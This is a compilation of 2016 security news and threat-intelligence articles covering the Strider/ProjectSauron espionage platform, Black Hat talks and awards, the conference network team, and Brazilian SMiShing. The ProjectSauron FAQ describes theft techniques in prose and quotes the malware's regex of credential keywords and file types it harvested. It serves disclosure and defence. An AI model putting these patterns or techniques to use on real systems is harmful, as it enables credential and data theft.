Trends and Analysis

Symantec Discovers Strider, A New CyberEspionage Group

In action five years, highly selective threat actor has only been known to compromise seven organizations. Symantec has discovered a previously unknown cyberespionage group so selective in its targets that it is only known to have compromised seven organizations and 36 endpoints since it started operating five years ago.

Dubbed "Strider" by Symantec, the threat actor's malware of choice is a custom, Windows infostealer called Remsec -- stealthy, modular, and written in Lua. The seven organizations include targets in Russia, an airline in China, an embassy in Belgium, and an organization in Sweden.

DiMaggio says this is an extremely small number of targets, even for a sophisticated actor.  "That's exactly why this is so interesting to us," says Jon DiMaggio, senior threat intelligence analyst at Symantec. " ...

The fact that someone invested the time and money into creating custom malware and only used it on this many targets." He says targeting this focused means that someone has gone through a lot of trouble and done a lot of reconaissance.   Symantec has not speculated on Strider's origins or Remsec's creators, other than to say in today's blog announcing the discovery that it is "possible that the group is a nation-state level attacker." Researchers do acknowledge, however, that the group's attacks have "tentative links" with earlier cyberespionage malware -- Flame, highly sophisticated malware that mostly hit targets in the Middle East and was widely thought to derive from Western sources. Remsec and Flame both use modules written in the Lua programming language, which is a rare technique.  DiMaggio says that using Lua is one of the Remsec authors' "self-protection mechanisms." Common security tools' usual logic and detection engines are less likely to find uncommon methods like this.
It's the same reason, DiMaggio says, that some components of the Remsec malware are in the form of executable blobs (binary large objects), which are also less common.  "That's what I would do if I was writing malware," says DiMaggio. It's not the end of Remsec's stealth mechanisms either.

According to the Symantec blog, "much of the functionality is deployed over the network, meaning it resides only in a computer's memory and is never stored on disk." The Lua modules in Remsec include a network loader, host loader, network listener, basic pipe back door, a more advanced pipe back door that can read, write and delete files), an HTTP back door that includes URLs for a command-and-control server, and a keylogger. The keylogger contains the word "Sauron" in the code -- perhaps named after the Lord of the Rings character and his famous flaming all-seeing eye.
Symantec continued with the LOTR theme when they named the threat actor Strider, one of Aragorn's alternate names.  For the complete indicators of compromise, see here. Related Content:   Sara Peters is Senior Editor at Dark Reading and formerly the editor-in-chief of Enterprise Efficiency. Prior that she was senior editor for the Computer Security Institute, writing and speaking about virtualization, identity management, cybersecurity law, and a myriad ...
View Full Bio More Insights

ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms

 Download the full report (PDF) Technical analysis Indicators of compromise (IOC)Download YARA rules More information about ProjectSauron is available to customers of Kaspersky Intelligence Reporting Service.

Contact: Introduction: Over the last few years, the number of “APT-related” incidents described in the media has grown significantly.

For many of these, though, the designation “APT”, indicating an “Advanced Persistent Threat”, is usually an exaggeration. With some notable exceptions, few of the threat actors usually described in the media are advanced.

These exceptions, which in our opinion represent the pinnacle of cyberespionage tools: the truly “advanced” threat actors out there, are Equation, Regin, Duqu or Careto.

Another such an exceptional espionage platform is “ProjectSauron”, also known as “Strider”. What differentiates a truly advanced threat actor from a wannabe APT? Here are a few features that characterize the ‘top’ cyberespionage groups: The use of zero day exploits Unknown, never identified infection vectors Have compromised multiple government organizations in several countries Have successfully stolen information for many years before being discovered Have the ability to steal information from air gapped networks Support multiple covert exfiltration channels on various protocols Malware modules which can exist only in memory without touching the disk Unusual persistence techniques which sometime use undocumented OS features “ProjectSauron” easily covers many of these points. From discovery to detection: When talking about long-standing cyber-espionage campaigns, many people wonder why it took so long to catch them. Perhaps one of the explanations is having the right tools for the right job.

Trying to catch government or military grade malware requires specialized technologies and products. One such product is Kaspersky’s AntiTargeted Attacks Platform, KATA (
In September 2015, our anti-targeted attack technologies caught a previously unknown attack.

The suspicious module was an executable library, loaded in the memory of a Windows domain controller (DC).

The library was registered as a Windows password filter and had access to sensitive data in cleartext.

Additional research revealed signs of massive activity from a new threat actor that we codenamed ‘ProjectSauron’, responsible for large-scale attacks against key governmental entities in several countries. “SAURON” – internal name used in the LUA scripts ProjectSauron comprises a top-of-the-top modular cyber-espionage platform in terms of technical sophistication, designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods.

Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes.

For example, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Some other key features of ProjectSauron: It is a modular platform designed to enable long-term cyber-espionage campaigns. All modules and network protocols use strong encryption algorithms, such as RC6, RC5, RC4, AES, Salsa20, etc. It uses a modified LUA scripting engine to implement the core platform and its plugins. There are upwards of 50 different plugin types. The actor behind ProjectSauron has a high interest in communication encryption software widely used by targeted governmental organizations.
It steals encryption keys, configuration files, and IP addresses of the key infrastructure servers related to the encryption software. It is able to exfiltrate data from air-gapped networks by using specially-prepared USB storage drives where data is stored in an area invisible to the operation system. The platform makes extensive use of the DNS protocol for data exfiltration and real-time status reporting. The APT was operational as early as June 2011 and remained active until April 2016. The initial infection vector used to penetrate victim networks remains unknown. The attackers utilize legitimate software distribution channels for lateral movement within infected networks. To help our readers better understand the ProjectSauron attack platform, we’ve prepared an FAQ which brings together some of the most important points about this attacker and its tools.

A brief technical report is also available, including IOCs and Yara rules. Our colleagues from Symantec have also released their analysis on ProjectSauron / Strider. You can read it here: ProjectSauron FAQ: 1. What is ProjectSauron? ProjectSauron is the name for a top level modular cyber-espionage platform, designed to enable and manage long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods. Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes.

As such, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Usually APT campaigns have a geographical nexus, aimed at extracting information within a specific region or from a given industry.

That usually results in several infections in countries within that region, or in the targeted industry around the world.
Interestingly, ProjectSauron seems to be dedicated to just a couple of countries, focused on collecting high value intelligence by compromising almost all key entities it could possibly reach within the target area. The name, ProjectSauron reflects the fact that the code authors refer to ‘Sauron’ in the LUA scripts. 2. Who are the victims? Using our telemetry, we found more than 30 infected organizations in Russia, Iran, Rwanda and possibly in Italian-speaking countries as well. Many more organizations and geographies are likely to be affected. The attacked organizations are key entities that provide core state functions: Government Scientific research centers Military Telecommunication providers Finance 3. Have you notified victims? As usual, Kaspersky Lab actively collaborates with industry partners, CERTs and law enforcement agencies to notify victims and help to mitigate the threat. We also rely on public awareness to spread information about it.
If you need more information about this actor, please contact 4.

For how long have the attackers been active? Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016.

Although it appears to have largely ceased, there is a chance that it is still active on computer systems that are not covered by Kaspersky Lab solutions. 5.

Did the attackers use interesting or advanced techniques? The attackers used multiple interesting and unusual techniques, including: Data exfiltration and real-time status reporting using DNS requests. Implant deployment using legitimate software update scripts. Data exfiltration from air-gapped networks through the use of specially prepared USB storage drives where the stolen data is stored in the area unused by standard tools of the operating system. Using a modified LUA scripting engine to implement the core platform and its plugins.

The use of LUA components in malware is very rare – it was previously spotted in the Flame and Animal Farm attacks. 6. How did you discover this malware? In September 2015, Kaspersky Lab’s Anti-Targeted Attack Platform discovered anomalous network traffic in a client organization’s network.

Analysis of this incident led to the discovery of a strange executable program library loaded into the memory of the domain controller server.

The library was registered as a Windows password filter and had access to sensitive data such as administrative passwords in cleartext.

Additional research revealed signs of activity of a previously unknown threat actor. 7. How does ProjectSauron operate? ProjectSauron usually registers its persistence module on domain controllers as a Windows LSA (Local Security Authority) password filter.

This feature is typically used by system administrators to enforce password policies and validate new passwords to match specific requirements, such as length and complexity.

This way, the ProjectSauron passive backdoor module starts every time any network or local user (including an administrator) logs in or changes a password, and promptly harvests the password in plaintext. In cases where domain controllers lack direct Internet access, the attackers install additional implants on other local servers which have both local network and Internet access and may pass through significant amount of network traffic, i.e. proxy-servers, web-servers, or software update servers.

After that, these intermediary servers are used by ProjectSauron as internal proxy nodes for silent and inconspicuous data exfiltration, blending in with high volumes of legitimate traffic. Once installed, the main ProjectSauron modules start working as ‘sleeper cells’, displaying no activity of their own and waiting for ‘wake-up’ commands in the incoming network traffic.

This method of operation ensures ProjectSauron’s extended persistence on the servers of targeted organizations. 8. What kind of implants does ProjectSauron use? Most of ProjectSauron’s core implants are designed to work as backdoors, downloading new modules or running commands from the attacker purely in memory.

The only way to capture these modules is by making a full memory dump of the infected systems. Almost all of ProjectSauron’s core implants are unique, have different file names and sizes, and are individually built for each target.

Each module’s timestamp, both in the file system and in its own headers, is tailored to the environment on which it is installed. Secondary ProjectSauron modules are designed to perform specific functions like stealing documents, recording keystrokes, and stealing encryption keys from both infected computers and attached USB sticks. ProjectSauron implements a modular architecture using its own virtual file system to store additional modules (plugins) and a modified LUA interpreter to execute internal scripts.

There are upwards of 50 different plugin types. 9. What is the initial infection vector? To date, the initial infection vector used by ProjectSauron to penetrate victim networks remains unknown. 10. How were the ProjectSauron implants deployed within the target network? In several cases, ProjectSauron modules were deployed through the modification of scripts used by system administrators to centrally deploy legitimate software updates within the network. In essence, the attackers injected a command to start the malware by modifying existing software deployment scripts.

The injected malware is a tiny module that works as a simple downloader. Once started under a network administrator account, this small downloader connects to a hard-coded internal or external IP address and downloads the bigger ProjectSauron payload from there. In cases where the ProjectSauron persistence container is stored on disk in EXE file format, it disguises the files with legitimate software file names. 11. What C&C infrastructure did the attackers use? The ProjectSauron actor is extremely well prepared when it comes to operational security. Running an expensive cyberespionage campaign like ProjectSauron requires vast domain and server infrastructure uniquely assigned to each victim organization and never reused again.

This makes traditional network-based indicators of compromise almost useless because they won’t be reused in any other organization. We collected 28 domains linked to 11 IPs located in the United States and several European countries that might be connected to ProjectSauron campaigns.

Even the diversity of ISPs selected for ProjectSauron operations makes it clear that the actor did everything possible to avoid creating patterns. 12.

Does ProjectSauron target isolated (air-gapped) networks? Yes. We registered a few cases where ProjectSauron successfully penetrated air-gapped networks. The ProjectSauron toolkit contains a special module designed to move data from air-gapped networks to Internet-connected systems.

To achieve this, removable USB devices are used. Once networked systems are compromised, the attackers wait for a USB drive to be attached to the infected machine. These USBs are specially formatted to reduce the size of the partition on the USB disk, reserving an amount of hidden data (several hundred megabytes) at the end of the disk for malicious purposes.

This reserved space is used to create a new custom-encrypted partition that won’t be recognized by a common OS, such as Windows.

The partition has its own semi-filesystem (or virtual file system, VFS) with two core directories: ‘In’ and ‘Out’. This method also bypasses many DLP products, since software that disables the plugging of unknown USB devices based on DeviceID wouldn’t prevent an attack or data leakage, because a genuine recognized USB drive was used. 13.

Does ProjectSauron target critical infrastructure? Some of the entities infected by ProjectSauron can be classified as critical infrastructure. However, we haven’t registered ProjectSauron infections inside industrial control system networks that have SCADA systems in place. Also, we have not yet seen a ProjectSauron module targeting any specific industrial hardware or software. 14.

Did ProjectSauron use any special communication methods? For network communication, the ProjectSauron toolkit has extensive abilities, leveraging the stack of the most commonly used protocols: ICMP, UDP, TCP, DNS, SMTP and HTTP. One of the ProjectSauron plugins is the DNS data exfiltration tool.

To avoid generic detection of DNS tunnels at network level, the attackers use it in low-bandwidth mode, which is why it is used solely to exfiltrate target system metadata. Another interesting feature in ProjectSauron malware that leverages the DNS protocol is the real-time reporting of the operation progress to a remote server. Once an operational milestone is achieved, ProjectSauron issues a DNS-request to a special subdomain unique to each target. 15. What is the most sophisticated feature of the ProjectSauron APT? In general, the ProjectSauron platform is very advanced and reaches the level of complexity of Regin, Equation and similar threat actors we have reported on in the past.
Some of the most interesting things in the ProjectSauron platform include: Multiple exfiltration mechanisms, including piggybacking on known protocols. Bypassing air-gaps using hidden data partitions on USB sticks. Hijacking Windows LSA to control network domain servers. Implementing an extended LUA engine to write custom malicious scripts to control the entire malware platform with a high-level language. 16.

Are the attackers using any zero-day vulnerabilities? To date we have not found any 0-day exploits associated with ProjectSauron. However, when penetrating isolated systems, the creation of the encrypted storage area in the USB does not in itself enable attackers to get control of the air-gapped machines.

There has to be another component such as a 0­day exploit placed on the main partition of the USB drive. So far we have not found any 0-day exploit embedded in the body of the malware we analyzed, and we believe it was probably deployed in rare, hard-to-catch instances. 17.
Is this a Windows-only threat? What versions of Windows are targeted? ProjectSauron works on all modern Microsoft Windows operating systems – both x64 and x86. We have witnessed infections running on Windows XP x86 as well as Windows 2012 R2 Server Edition x64. To date, we haven’t found a non-Windows version of ProjectSauron. 18. Were the attackers hunting for specific information? ProjectSauron actively searches for information related to rather uncommon, custom network encryption software.

This client-server software is widely adopted by many of the target organizations to secure communications, voice, email, and document exchange. In a number of the cases we analyzed, ProjectSauron deployed malicious modules inside the custom network encryption’s software directory, disguised under similar filenames and accessing the data placed beside its own executable.
Some of extracted LUA scripts show that the attackers have a high interest in the software components, keys, configuration files, and the location of servers that relay encrypted messages between the nodes. Also, one of the embedded ProjectSauron configurations contains a special unique identifier for the targeted network encryption software’s server within its virtual network.

The behavior of the component that searches for the server IP address is unusual.

After getting the IP, the ProjectSauron component tries to communicate with the remote server using its own (ProjectSauron) protocol as if it was yet another C&C server.

This suggests that some communication servers running the mentioned network encryption software could also be infected with ProjectSauron. 19. What exactly is being stolen from the targeted machines? The ProjectSauron modules we found are able to steal documents, record keystrokes and steal encryption keys from infected computers and attached USB sticks. The fragment of configuration block below, extracted from ProjectSauron, shows the kind of information and file extensions the attackers were looking for: .*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*|.*user.*|.*name|.*email|.*_id|id|uid|mn|mailaddress|.*nick.*|alias|codice|uin|sign-in|strCodUtente|.*pass.*|.*pw|pw.*|additional_info|.*secret.*|.*segreto.*[^\$]$ ^.*\.(doc|xls|pdf)$ *.txt;*.doc;*.docx;*.ppt;*.pptx;*.xls;*.xlsx;*.vsd;*.wab;*.pdf;*.dst;*.ppk;*.rsa;*.rar;*.one;*.rtf;~WPL*.tmp;*.FTS;*.rpt;*.conf;*.cfg;*.pk2;*.nct;*.key;*.psw Interestingly, while most of the words and extensions above are in the English language, several of them point to Italian, such as: ‘codice’, ‘strCodUtente’ and ‘segreto’. Keywords / filenames targeted by ProjectSauron data theft modules: Italian keyword Translation Codice code CodUtente Usercode Segreto Secret This suggests the attackers had prepared to attack Italian-speaking targets as well. However, we are not aware of any Italian victims of ProjectSauron at the moment. 20. Have you observed any artifacts indicating who is behind the ProjectSauron APT? Attribution is hard and reliable attribution is rarely possible in cyberspace.

Even with confidence in various indicators and apparent attacker mistakes, there is a greater likelihood that these are smoke and mirrors created by an attacker with a greater vantage point and vast resources. When dealing with the most advanced threat actors, as is the case with ProjectSauron, attribution becomes an unsolvable problem. 21.
Is this a nation-state sponsored attack? We think an operation of such complexity, aimed at stealing confidential and secret information, can only be executed with support from a nation-state. 22. What would ProjectSauron have cost to set up and run? Kaspersky Lab has no exact data on this, but estimates that the development and operation of ProjectSauron is likely to have required several specialist teams and a budget probably running into millions of dollars. 23. How does the ProjectSauron platform compare to other top-level threat actors? The actor behind ProjectSauron is very advanced, comparable only to the top-of-the-top in terms of sophistication: alongside Duqu, Flame, Equation, and Regin. Whether related or unrelated to these advanced actors, the ProjectSauron attackers have definitely learned from them. As a reminder, here are some features of other APT attackers which we discovered that the ProjectSauron attackers had carefully learned from or emulated: Duqu: Use of intranet C&Cs (where compromised target servers may act as independent C&Cs) Running only in memory (persistence on a few gateway hosts only) Use of different encryption methods per victim Use of named pipes for LAN communication Malware distribution through legitimate software deployment channels Flame: LUA-embedded code Secure file deletion (through data wiping) Attacking air-gapped systems via removable devices Equation and Regin: Usage of RC5/RC6 encryption Virtual Filesystems (VFS) Attacking air-gapped systems via removable devices Hidden data storage on removable devices These other actors also showed what made them vulnerable to potential exposure, and ProjectSauron did its best to address these issues: Vulnerable or persistent C&C locations ISP name, IP, domain, and tools reuse across different campaigns Crypto-algorithm reuse (as well as encryption keys) Forensic footprint on disk Timestamps in various components Large volumes of exfiltrated data, alarming unknown protocols or message formats In addition, it appears that the attackers took special care with what we consider as indicators of compromise and implemented a unique pattern for each and every target they attacked, so that the same indicators would have little value for anyone else.

This is a summary of the ProjectSauron strategy as we see it.

The attackers clearly understand that we as researchers are always looking for patterns. Remove the patterns and the operation will be harder to discover. We are aware of more than 30 organizations attacked, but we are sure that this is just a tiny tip of the iceberg. 24.

Do Kaspersky Lab products detect all variants of this malware? All Kaspersky Lab products detect ProjectSauron samples as HEUR:Trojan.Multi.Remsec.gen 25.

Are there Indicators of Compromise (IOCs) to help victims identify the intrusion? ProjectSauron’s tactics are designed to avoid creating patterns.
Implants and infrastructure are customized for each individual target and never re-used – so the standard security approach of publishing and checking for the same basic indicators of compromise (IOC) is of little use. However, structural code similarities are inevitable, especially for non-compressed and non-encrypted code.

This opens up the possibility of recognizing known code in some cases. That’s why, alongside the formal IOCs, we have added relevant YARA rules. While the IOCs have been listed mainly to give examples of what they look like, the YARA rules are likely to be of greater use and could detect real traces of ProjectSauron. For background: YARA is a tool for uncovering malicious files or patterns of suspicious activity on systems or networks that share similarities. YARA rules—basically search strings—help analysts to find, group, and categorize related malware samples and draw connections between them in order to build malware families and uncover groups of attacks that might otherwise go unnoticed. We have prepared our YARA rules based on tiny similarities and oddities that stood out in the attackers’ techniques.

These rules can be used to scan networks and systems for the same patterns of code.
If some of these oddities appear during such a scan, there is a chance that the organizations has been hit by the same actor. More information about ProjectSauron is available to customers of Kaspersky Intelligence Reporting Service.


Blackhat USA 2016

This year’s Blackhat USA briefings were held at the spacious Mandalay Bay, bringing speakers from all over the world to deliver mostly technical cyber-security talks. A number of our researchers were there attending talks and participating in the parallel IOActive and BSides events on Smart Cities cyber-security and “Stealing Food From the Cat’s Mouth”. We even bought a round of drinks for a GReAT happy hour at our booth, thanks for coming by! And on Tuesday night, we announced a public HackerOne-coordinated bug bounty program, setting aside $50,000 for critical vulnerabilities. Blackhat whitepapers, slidedecks, and some source code are being posted to the site. Talks and speakers that we enjoyed here: DEMYSTIFYING THE SECURE ENCLAVE PROCESSOR and BEHIND THE SCENES OF IOS SECURITY Low level details of Apple iPhone security were presented, both from offensive researchers hacking apart hardware and software, and one of the vendor’s lead security engineers Ivan Krstic. They revealed cryptographic design and implementation details of the secure enclave processor and its OS, the iCloud keychain, and JIT hardening, and pointed out some weaknesses and areas for likely security vulnerabilities in the code. CAPTAIN HOOK: PIRATING AVS TO BYPASS EXPLOIT MITIGATIONS The speakers demonstrated how many AV vendors are performing inline and Kernel to user hooking for exploit mitigation, and how this is being done insecurely. They were able to utilize the mistakes made in the various hooking engines to run malicious code in memory. Their research identified six different types of vulnerabilities in the hooking engines and how to exploit them. Essentially, most of the vulnerabilities boiled down to improper handling of permissions on created memory blocks by the AV engines. ADVANCED CAN INJECTION TECHNIQUES FOR VEHICLE NETWORKS As always, Charlie and Chris delivered a fantastic talk on the next step in their research; targeting CAN to manipulate vehicle behaviors while driving at high speeds. While their research was done hard wired into the car, they stated that if another remote vulnerability were discovered, these attacks would be plausible remotely, not requiring physical access. They showed how they were able to manipulate various vehicles to apply the emergency brake, turn off the power steering module, control the steering, etc, all while driving at a high speed. They had to essentially bypass security measures which don’t normally allow diagnostic mode to be invoked while the car is on or in motion. In normal Charlie and Chris fashion, the talk was full of funny videos of their exploits, one of which showed them crashing their Jeep into a ditch in a cornfield and subsequently having to be rescued by some locals. 🙂 A few GReAT researchers were caricatured by an artist at our Kaspersky Lab booth, next to our Kaspersky Anti-Targeted Attack demo. The artist was good! Defcon’s challenge badges ran out in record time this year at under 60 minutes! The conference is going on now at Paris and Bally’s. See you next year!

Hackers Used Malware To Spy On A Territorial Dispute

Cyber warfare appears to be the latest tool deployed in the territorial dispute over the South China Sea Image: iStock Hackers have used targeted malware to steal data from some of the governments and private sector organisations involved in the disput...

Best Of Black Hat Innovation Awards: And The Winners Are…

Three companies and leaders who think differently about security: Deep Instinct, most innovative startup; Vectra, most innovative emerging company; Paul Vixie, most innovative thought leader. Dark Reading this year is launching a new annual awards program, the Best of Black Hat Awards, which recognizes innovative companies and business leaders on the conference’s exhibit floor. The 2016 Dark Reading Best of Black Hat Awards recognize three categories of achievement: the Most Innovative Startup, which cites companies that have been in the industry for three years or less; the Most Innovative Emerging Company, which cites companies that have been operating for three to five years; and the Most Innovative Thought Leader, which recognizes individuals from exhibiting companies who are changing the way the industry thinks about security. These new awards, chosen by the editors of Dark Reading, are not an endorsement of any product, but are designed to recognize innovative technology ideas and new thinking in the security arena.
In future years, Dark Reading hopes to expand the awards program to recognize new products in different categories, as well as more individuals who are making a difference in the way we think about security. Most Innovative Startup: Deep InstinctThe finalists for our Most Innovative Startup Award are Deep Instinct, which is driving past machine learning with an artificial intelligence concept called deep learning; Phantom, a security orchestration tool that provides a layer of connective tissue between existing security products; and SafeBreach, which provides a hacker’s view of enterprise security posture. The winner is: Deep Instinct. Here’s what our judges wrote about Deep Instinct:  “This was not an easy decision—each of the finalists, Phantom, Deep Instinct, and SafeBreach, bring really intriguing and useful technology to the security problem. In the end, we selected Deep Instinct as the Most Innovative Startup. Here’s why:  the concept of a cerebral system to detect malware and malicious activity at the point of entry in real-time and quashing it then and there solves many of the other security problems down the line.
If the tool can catch the malware when it hits the endpoint, a security pro theoretically wouldn’t need to check out security alerts, correlate them among various security tools and threat intel feeds, and then take the appropriate action (sometimes too late).

And unlike traditional antivirus, this technology looks at all types of threats, not just known malware, which of course is key today given the polymorphic nature of malware. We considered Deep Instinct’s approach of automatically stopping a threat at the endpoint, where it first comes in, using software that can on its own understand that it’s a threat and continuously learn about threats as unique and promising for security organizations.

Deep learning is the next stage of machine learning, mimicking the brain’s ability to learn and make decisions, and Deep Instinct is the first company to apply this type of artificial intelligence to cybersecurity, which also made it a top choice. In addition, benchmark tests of Deep Instinct’s technology indicate a high degree of accuracy in detecting malware, at 99.2%.

And unlike some endpoint security approaches, it occurs locally and there’s no sandbox or kicking it to the cloud for additional analysis.” Most Innovative Emerging Company: VectraThe three finalists for our Most Innovative Emerging Company are SentinelOne, which combines behavioral-based inspection of endpoint system security processes with machine learning;  Vectra, which offers real-time detection of in-progress cyber attacks and helps prioritize the attacks based on business priority; and ZeroFOX, which monitors social media to help protect against phishing attacks and account compromise. And the winner is: Vectra. Here’s what our judges wrote about Vectra:  “It was a tough choice, but in the end, we selected Vectra, because it addressed several of security professionals’ most persistent challenges, with solutions that were both inventive and practical. Infosec pros are inundated with alerts about threats. Whether those warnings come from media reports, newsletters, or one of many pieces of security technology, it’s often hard to prioritize them. Maybe it was declared “critical,” but is it critical to me? Maybe it was “medium,” but is it critical to me? Infosec pros have attackers dwelling on their networks for many, many months, largely because security teams cannot quickly make sense of all this threat data.

And infosec pros try to solve problems faster by adding new security technology that can sometimes put a huge strain on the network. We chose Vectra as the winner, because their solution helps prioritize threats for your organization specifically, can reduce attacker dwell time, and do so with a lightweight solution. Vectra’s tool tunes into all an organization’s internal network communications, and then, using a combination of machine learning, behavior analysis, and data science will identify threats, correlate them to the targeted endpoint, provide context, and prioritize threats accordingly -- as they relate to your organization.
Vectra can detect things like internal reconnaissance, lateral movement, botnet monetization, data exfiltration and other malicious or potentially malicious activities throughout the kill chain. Most importantly, Vectra’s tool allows security teams to identify their most important assets, so that the tool will know to push even a gentle nudge at those systems to the top of the priority list. With just a glance at the simple, elegant visualization used by Vectra’s threat certainty index, an infosec pro will know in moments what precise endpoint needs their attention first.” Most Innovative Thought Leader: Paul VixieThe three finalists for our Most Innovative Thought Leader are Krishna Narayanaswamy, Chief Scientist and Co-Founder of Netskope, Inc., a top specialist in cloud security; Dr. Paul Vixie, Chairman, CEO, and Co-Founder of Farsight Security Inc., a leader in DNS and Internet security; and Jeff Williams, Chief Technology Officer and Co-Founder of Contrast Security, who focuses on application security. And the winner is: Paul Vixie, Farsight Security. Here’s what our judges wrote about Paul:  “This was perhaps the most difficult choice we had to make in the awards, because all three of these individuals are thought leaders and difference-makers in their own fields of security.

Each of them is a contributor not only to innovation in his own company, but to the industry at large. In the end, we chose Paul Vixie, at least in part, because he likes to work and research and innovate in areas where few others are working.

The world of Domain Name Systems often seems impenetrable even to security experts, yet it is an essential element to the global Internet and, potentially, a huge set of vulnerabilities that could affect everyone who works and plays online. In the last year or so, Paul has taken some of the lessons he’s learned about DNS and the way the internet works and built Farsight Security, which collects and processes more than 200,000 observations per second to help security operations centers and incident response teams more quickly identify threats.
It works by analyzing DNS, which is a fundamental technology that the bad guys have to use, just as the good guys do.

And while Farsight is not the only company working in the DNS security space, it has developed new methods of analyzing and processing the data so that enterprises can make better use of relevant information. Paul doesn’t stop with the work he is doing at his own company.

As a longtime contributor to internet standards on DNS and related issues, he continues to participate in a variety of efforts, including source address validation; the OpSec Trust initiative, which is building a trusted, vetted security community for sharing information, and internet governance, including the controversial discussion around route name service. While all three of our finalists are deserving of special recognition, we feel that Paul Vixie’s contributions to innovation at his company, to enterprise security, and to internet security worldwide earn him this award.” Our congratulations to all of this year’s Dark Reading Best of Black Hat Awards winners! Tim Wilson is Editor in Chief and co-founder of Dark, UBM Tech's online community for information security professionals. He is responsible for managing the site, assigning and editing content, and writing breaking news stories. Wilson has been recognized as one ...
View Full Bio More Insights

Meet The BlackHat NOC People Who Let Malware Roam Free

It's not cool to kill a demo, but you can watch all the pr0n you want Black Hat Neil Wyler and Bart Stump are responsible for managing what is probably the world’s most-attacked wireless network. The two friends, veterans among a team of two dozen, are at the time of writing knee deep in the task of running the network at Black Hat, the security event where the world reveals the latest security messes. The event kicks off with three days of training, then unleashes tempered anarchy as the conference proper gets under way. Wyler, better known as Grifter (@grifter801), heads the network operations centre (NoC) at Black Hat, an event he has loved since he was 12 years old. “I literally grew up among the community,” he says. Bart (@stumper55) shares the job. Wyler's day job is working for RSA's incident response team while Stumper is an engineer with Optiv, but their Black Hat and DEF CON experience trumps their professional status. Wyler has worked with Black Hat for 14 years and DEF CON for 17 years, while Stump has chalked up nine years with both hacker meets. Together with an army of capable network engineers and hackers they operate one of the few hacker conference networks that delegates and journalists are officially advised to avoid. Rightly so; over the next week the world’s talented hacker contingent will flood Las Vegas for Black Hat and DEF CON, the biggest infosec party week of the year.

The diverse talents – and ethics – of the attending masses render everything from local ATMs to medical implants potentially hostile and not-to-be-trusted. Some 23 network and security types represent the network operations centre (NoC) and are responsible for policing the Black Hat network they help create.

Come August each member loosens the strict defensive mindset they uphold in their day jobs as system administrators and security defenders to let the partying hackers launch all but the nastiest attacks over their network. “We will sit back and monitor attacks as they happen," Wyler tells The Register from his home in the US. "It's not your average security job." The Black Hat NoC.
Image: supplied. The crew operates with conference din as a background, sometimes due to cheers as speakers pull off showy hacks or offer impressive technical demos in rotating shifts.
In the NoC, some laugh, some sleep, and all work in a pitch broken by the glow of LEDs and computer screens.

Their score is a backdrop of crunching cheese Nachos, old hacker movies, and electronic music. "Picture it in the movies, and that's what it's like," Stump says, commiserating with your Australia-based scribe's Vegas absence; "it'll be quite a sight, you'll be missing something". Delegates need not.

The NoC will again be housed in The Fish Bowl, a glass den housing the crew and mascots Lyle the stuffed ape and Helga the inflatable sheep.

Delegates are welcome to gawk. Risky click The NoC operators at Black Hat and DEF CON need to check their defensive reflexes at the door in part to allow a user base consisting almost entirely of hackers to pull pranks and spar, and in part to allow presenters to legitimately demonstrate the black arts of malware. When you see traffic like that, you immediately go into mitigation mode to respond to that threat," Wyler says. "Black Hat is a very interesting network because you can't do that - we have to ask if we are about to ruin some guy's demonstration on stage in front of 4000 people". Stump recalls intruding on a training session in a bid to claim the scalp of a Black Hat found slinging the infamous Zeus banking trojan. "The presenter says 'it's all good, we are just sending it up to AWS for our labs' and we had a laugh; I couldn't take the normal security approach and simply block crazy shit like this." Flipping malware will get you noticed and monitored by one of the NoC's eager operators who will watch to see if things escalate beyond what's expected of a normal demonstration. If legitimate attacks are seeping out of a training room, the sight of Wyler, Stump, or any other NoC cop wordlessly entering with a walkie-talkie clipped to hip and a laptop under arm is enough for the Black Hat activity to cease. "It is part of the fun for us," Wyler says. "Being able to track attacks to a location and have a chat." Targeting the Black Hat network itself will immediately anger the NoC, however. The team has found all manner of malware pinging command and control servers over its network, some intentional, and some from unwittingly infected delegates. "We'll burst in and say anyone who's MAC address ends with this, clean up your machine," Stump says. $4000 smut-fest Training is by far the most expensive part of a hacker conference. Of the 71 training sessions running over the weekend past ahead of the Black Hat main conference, each cost between US$2500 (£1887, A$3287) and US$5300 (£4000, A$6966) with many students having the charge covered by generous bosses. Bart and the blow up doll cameo on CNN Money. So it was to this writer's initial incredulity that most of the sea of "weird porn" flowing through the Black Hat pipes stems from randy training students. "It is more than it should ever be," Wyler says of the Vegas con's porn obsession. "While you are at a training class - I mean it's not even during lunch." The titillating tidbit was noticed when one NoC cop hacked together a script to pull and project random images from the network traffic on Fish Bowl monitors.

A barrage of flesh sent the shocked operators into laughing fits of ALT-TAB.

Another moment was captured when Stump was filmed for on CNN Money and a shopper's blow up doll appeared with perfect timing. Balancing act Black Hat's NoC started as an effective but hacked-together effort by a group of friends just ahead of the conference.

Think Security Onion, intrusion detection running on Kali, and Openbsd boxes. Now they have brought on security and network muscle, some recruited from a cruise through the expo floor, including two one-gigabit pipes from CenturyLink with both running about 600Mbps on each. "We were used to being a group of friends hanging out where a lot of stuff happened on site, and now we've brought in outsiders," Stump says. Ruckus Wireless, Fortinet, RSA and CenturyLink are now some of the vendors that help cater to Black Hat's more than 70 independent networks. "It's shenanigans," Wyler says. "But we love it." The pair do not and cannot work on the DEF CON networks since they are still being built during Black Hat, but they volunteer nonetheless leading and helping out with events, parties, and demo labs.
I feel a responsibility to give back to the community which feeds me," Wyler says. "That's why we put in the late nights." ® Sponsored: 2016 Cyberthreat defense report

SMiShing and the rise of mobile banking attacks

Brazilian cybercriminals are clearly setting their sights on users of mobile banking, with a huge rise in incidents registered in the country over the last two years.
In order to carry out these attacks they are using SMiShing (phishing via SMS) and registering new mobile phish domains created especially for this purpose. In 2015, mobile banking usage in Brazil reached 11.2 billion transactions, an increase of 138% compared to the 4.7 billion transactions registered in 2014. Mobile banking is now the second most popular channel for accessing a bank account in the country – there are more than 33 million active accounts, according to the Brazilian Federation of Banks.
